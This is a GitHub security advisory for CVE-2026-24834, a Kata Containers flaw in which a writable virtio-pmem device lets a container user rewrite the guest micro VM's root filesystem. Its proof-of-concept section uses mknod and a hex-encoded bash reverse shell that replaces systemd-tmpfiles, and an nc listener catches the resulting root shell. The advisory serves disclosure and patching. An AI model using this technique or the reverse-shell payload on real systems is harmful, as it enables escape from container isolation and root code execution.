Skip to content

Kata Container to Guest micro VM privilege escalation

Moderate severity GitHub Reviewed Published Feb 19, 2026 in kata-containers/kata-containers • Updated Feb 19, 2026

Package

gomod github.com/kata-containers/kata-containers/src/runtime (Go)

Affected versions

< 0.0.0-20260219090056-6a672503973b

Patched versions

0.0.0-20260219090056-6a672503973b

Description

Summary

An issue in Kata with Cloud Hypervisor allows a user of the container to modify the file system used by the Guest micro VM ultimately achieving arbitrary code execution as root in said VM. The current understinding is this doesn’t impact the security of the Host or of other containers / VMs running on that Host (note that arm64 QEMU lacks NVDIMM read-only support: It is believed that until the upstream QEMU gains this capability, a guest write could reach the image file).

Details

Linux virtio-pmem
The virtio-pmem probe path always registers the region as a generic pagemap that supports asynchronous flushes, but it never marks the region as read-only. Only the ND_REGION_PAGEMAP and ND_REGION_ASYNC bits are set before the region is created, so nd_region->ro always stays cleared and the block device is left writable.

Later, pmem_attach_disk() wires the region into the block layer with full read/write semantics – the block device operations call pmem_do_write() which performs cache-flushed memcpy operations directly into the host-provided shared memory window. nvdimm_check_and_set_ro() would set the disk read-only if the region had been flagged as such, but because virtio_pmem never sets that flag, the helper becomes a no-op.

Cloud-Hypervisor virtio_pmem
discard_writes=on causes the file backing the virtio-pmem device to be opened read-only and mapped with MAP_PRIVATE rather than MAP_SHARED. That combination means the guest can modify the private copy of the mapped pages, but those modifications never propagate back to the underlying file. The guest (and Cloud Hypervisor process) will still read the modified data because it lives in the private copy of the mapping, so write-then-read sequences appear to succeed even though nothing is persisted. Once the mapping is dropped or the VM is restarted, those copy-on-write changes disappear, leaving the backing file unchanged.

Kata /dev/pmem0
Kata boots each pod/VM by DAX-mapping a read-only guest image from the host into the VM and telling the guest kernel to mount the resulting /dev/pmem* device as its root filesystem.
Since DAX maps the backing file directly into guest memory, there is no way for the hypervisor to intercept or reject individual stores, so a container with sufficient permissions can open /dev/pmem0 and observe its own writes until the VM is rebooted or the cache is dropped.

PoC

When putting all this together, this means that a user of a Container (not necessarily privileged, we don’t need CAP_SYS_ADMIN, but we need CAP_MKNOD) can modify the Guest OS filesystem, replacing libraries or binaries to achieve arbitrary code execution outside of the Container. This requires computing offsets of files within the device, which requires information like the partition start sector, sector size in bytes, the filesystem block size, and the physical block index of the file.

To achieve execution on the Guest, I replaced /usr/bin/systemd-tmpfiles with a connect-back shell to localhost: timers end up executing 15min after boot.
I use debugfs to not require mounting privileges and work directly with the filesystem on /dev/pmem0p1 to get the absolute offset of the file to modify in the device.

If you want a simpler PoC, just dd write something into /dev/pmem0 and observe it's dd readable until discarded.

root@ab5392da44ce:~# mknod /dev/pmem0 b 259 0
root@ab5392da44ce:~# mknod /dev/pmem0p1 b 259 1
root@ab5392da44ce:~# python pmem.py --file /usr/bin/systemd-tmpfiles --write --pattern 23212f62696e2f626173680a62617368202d69203e26202f6465762f7463702f3132372e302e302e312f34343320303e26310a6578697420300a
=== Resolution ===
Partition device:         /dev/pmem0p1 (pmem0p1)
Partition start (sectors): 2048
Sector size (bytes):       512
Partition start (bytes):   1048576
Filesystem block size:     4096
File path:                 /usr/bin/systemd-tmpfiles
File offset (bytes):       0
Logical block index:       0
Intra-block offset:        0
Physical block index:      40668
→ Absolute pmem offset:    167624704
[*] Raw read (64 bytes at 167624704):
09fdc000  7f 45 4c 46 02 01 01 00  00 00 00 00 00 00 00 00 |.ELF............|
09fdc010  03 00 3e 00 01 00 00 00  20 66 00 00 00 00 00 00 |..>..... f......|
09fdc020  40 00 00 00 00 00 00 00  48 82 01 00 00 00 00 00 |@.......H.......|
09fdc030  00 00 00 00 40 00 38 00  0d 00 40 00 20 00 1f 00 |....@.8...@. ...|
[+] Wrote 58 bytes at absolute offset 167624704. Verifying...
09fdc000  23 21 2f 62 69 6e 2f 62  61 73 68 0a 62 61 73 68 |#!/bin/bash.bash|
09fdc010  20 2d 69 20 3e 26 20 2f  64 65 76 2f 74 63 70 2f | -i >& /dev/tcp/|
09fdc020  31 32 37 2e 30 2e 30 2e  31 2f 34 34 33 20 30 3e |127.0.0.1/443 0>|
09fdc030  26 31 0a 65 78 69 74 20  30 0a                   |&1.exit 0.|
root@ab5392da44ce:~# nc -lvp 443
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:44880.
bash: cannot set terminal process group (329): Inappropriate ioctl for device
bash: no job control in this shell
root@localhost:/# 
root@localhost:/# ps auxw
ps auxw
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.0  17280  1920 ?        Ss   16:16   0:01 /sbin/init
root           2  0.0  0.0      0     0 ?        S    16:16   0:00 [kthreadd]
root           3  0.0  0.0      0     0 ?        S    16:16   0:00 [pool_workqueue_release]
root           4  0.0  0.0      0     0 ?        I<   16:16   0:00 [kworker/R-rcu_gp]
root           5  0.0  0.0      0     0 ?        I<   16:16   0:00 [kworker/R-sync_wq]
root           6  0.0  0.0      0     0 ?        I<   16:16   0:00 [kworker/R-slub_flushwq]
root           7  0.0  0.0      0     0 ?        I<   16:16   0:00 [kworker/R-netns]
root           9  0.0  0.0      0     0 ?        I<   16:16   0:00 [kworker/0:0H-events_highpri]
root          10  0.0  0.0      0     0 ?        I    16:16   0:01 [kworker/0:1-events_power_efficient]
root          12  0.0  0.0      0     0 ?        I<   16:16   0:00 [kworker/R-mm_percpu_wq]
root          13  0.0  0.0      0     0 ?        I    16:16   0:00 [rcu_tasks_trace_kthread]
root          14  0.0  0.0      0     0 ?        S    16:16   0:00 [ksoftirqd/0]
root          15  0.0  0.0      0     0 ?        I    16:16   0:00 [rcu_sched]
root          16  0.0  0.0      0     0 ?        S    16:16   0:00 [rcu_exp_par_gp_kthread_worker/1]
root          17  0.0  0.0      0     0 ?        S    16:16   0:00 [rcu_exp_gp_kthread_worker]
root          18  0.0  0.0      0     0 ?        S    16:16   0:00 [migration/0]
root          19  0.0  0.0      0     0 ?        S    16:16   0:00 [cpuhp/0]
root          20  0.0  0.0      0     0 ?        S    16:16   0:00 [kdevtmpfs]
root          21  0.0  0.0      0     0 ?        I<   16:16   0:00 [kworker/R-inet_frag_wq]
root          22  0.0  0.0      0     0 ?        S    16:16   0:00 [kauditd]
root          23  0.0  0.0      0     0 ?        S    16:16   0:00 [oom_reaper]
root          24  0.0  0.0      0     0 ?        I<   16:16   0:00 [kworker/R-writeback]
root          25  0.0  0.0      0     0 ?        S    16:16   0:00 [kcompactd0]
root          26  0.0  0.0      0     0 ?        I<   16:16   0:00 [kworker/R-cryptd]
root          27  0.0  0.0      0     0 ?        I<   16:16   0:00 [kworker/R-kblockd]
root          28  0.0  0.0      0     0 ?        I<   16:16   0:00 [kworker/0:1H]
root          29  0.0  0.0      0     0 ?        I    16:16   0:00 [kworker/u256:1-events_unbound]
root          30  0.0  0.0      0     0 ?        S    16:16   0:00 [kswapd0]
root          31  0.0  0.0      0     0 ?        I<   16:16   0:00 [kworker/R-xfsalloc]
root          32  0.0  0.0      0     0 ?        I<   16:16   0:00 [kworker/R-xfs_mru_cache]
root          33  0.0  0.0      0     0 ?        I<   16:16   0:00 [kworker/u257:0]
root          34  0.0  0.0      0     0 ?        I<   16:16   0:00 [kworker/R-kthrotld]
root          36  0.0  0.0      0     0 ?        S    16:16   0:00 [irq/25-ACPI:Ged]
root          37  0.0  0.0      0     0 ?        I<   16:16   0:00 [kworker/R-nfit]
root          38  0.0  0.0      0     0 ?        I    16:16   0:00 [kworker/0:2-virtio_vsock]
root          39  0.0  0.0      0     0 ?        S    16:16   0:00 [hwrng]
root          40  0.0  0.0      0     0 ?        I    16:16   0:00 [kworker/u256:2-events_unbound]
root          41  0.0  0.0      0     0 ?        I<   16:16   0:00 [kworker/R-vfio-irqfd-cleanup]
root          42  0.0  0.0      0     0 ?        I<   16:16   0:00 [kworker/R-mld]
root          43  0.0  0.0      0     0 ?        I<   16:16   0:00 [kworker/R-ipv6_addrconf]
root          81  0.0  0.0      0     0 ?        S    16:16   0:00 [jbd2/pmem0p1-8]
root          82  0.0  0.0      0     0 ?        I<   16:16   0:00 [kworker/R-ext4-rsv-conversion]
root          99  0.0  0.0      0     0 ?        I    16:16   0:00 [kworker/u256:3]
root         105  0.0  0.0  62032  2568 ?        Ssl  16:16   0:02 /usr/bin/kata-agent
_chrony      117  0.0  0.0  10692   540 ?        S    16:16   0:02 /usr/sbin/chronyd -F 1
_chrony      120  0.0  0.0  10560   460 ?        S    16:16   0:00 /usr/sbin/chronyd -F 1
root         122  0.2  1.0  44876 31556 ?        S    16:16   0:11 python -m server
message+     124  0.0  0.0   8120   384 ?        Ss   16:16   0:00 @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root         129  0.0  0.0      0     0 ?        S    16:16   0:00 [cpuhp/1]
root         130  0.0  0.0      0     0 ?        S    16:16   0:00 [migration/1]
root         131  0.0  0.0      0     0 ?        S    16:16   0:00 [ksoftirqd/1]
root         132  0.0  0.0      0     0 ?        I    16:16   0:00 [kworker/1:0-mm_percpu_wq]
root         133  0.0  0.0      0     0 ?        I<   16:16   0:00 [kworker/1:0H-events_highpri]
root         134  0.0  0.0      0     0 ?        I<   16:16   0:00 [kworker/1:1H]
root         142  0.0  0.0   5400  2220 pts/0    Ss   16:16   0:00 bash -l
root         145  0.0  0.0      0     0 ?        I    16:16   0:00 [kworker/1:1]
root         323  0.0  0.1  13212  3448 pts/0    R+   16:17   0:00 nc -lvp 443
root         329  0.0  0.0   4780   256 ?        Ss   16:31   0:00 /bin/bash /usr/bin/systemd-tmpfiles --clean
root         330  0.0  0.0   5048   512 ?        S    16:31   0:00 bash -i
root         377  0.0  0.0   7480   256 ?        R    17:33   0:00 ps auxw
root@localhost:/#

Impact

Container to Guest micro VM Escape (no escape to Host, no persistence of the overwritten image)

References

Published to the GitHub Advisory Database Feb 19, 2026
Reviewed Feb 19, 2026
Published by the National Vulnerability Database Feb 19, 2026
Last updated Feb 19, 2026

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v4 base metrics

Exploitability Metrics
Attack Vector Local
Attack Complexity High
Attack Requirements Present
Privileges Required Low
User interaction None
Vulnerable System Impact Metrics
Confidentiality None
Integrity None
Availability None
Subsequent System Impact Metrics
Confidentiality High
Integrity High
Availability High

CVSS v4 base metrics

Exploitability Metrics
Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.
Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.
Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.
Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.
User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.
Vulnerable System Impact Metrics
Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.
Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).
Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.
Subsequent System Impact Metrics
Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.
Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).
Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.
CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(2nd percentile)

Weaknesses

Incorrect Permission Assignment for Critical Resource

The product specifies permissions for a security-critical resource in a way that allows that resource to be read or modified by unintended actors. Learn more on MITRE.

CVE ID

CVE-2026-24834

GHSA ID

GHSA-wwj6-vghv-5p64

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.